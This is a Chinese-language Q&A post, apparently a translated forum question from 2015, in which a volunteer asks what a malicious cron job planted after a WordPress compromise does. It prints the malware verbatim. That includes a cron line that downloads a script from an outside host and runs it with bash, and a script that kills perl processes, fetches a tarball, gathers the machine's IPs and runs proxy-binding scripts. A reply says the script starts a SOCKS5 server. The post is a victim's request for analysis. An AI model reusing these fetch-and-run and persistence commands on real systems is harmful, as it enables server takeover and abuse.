【发布时间】:2015-01-05 05:01:49
【问题描述】:
显然,我做一些志愿者工作的网站是最近一次黑客攻击中针对的数千个网站之一,该黑客利用了 wordpress 中的一些漏洞。违规的结果是向网站添加了一个 cron 作业:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
它正在拉取的文件是这个(显然,不要尝试执行这个......)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
我希望有人能告诉我它的作用?我清理了 cron 作业,并将遵循所有其他可用的建议来再次保护站点,但我担心可能会造成一些不那么明显的额外损害。我只是不知道那个文件到底在做什么。
【问题讨论】:
-
“该文件到底在做什么。”: 它会杀死所有 perl 进程,然后在所有机器的外部 IP 上启动 SOCKS5 服务器,特别是 Simple SOCKS5 Server for Perl地址。
标签: wordpress bash malware cracking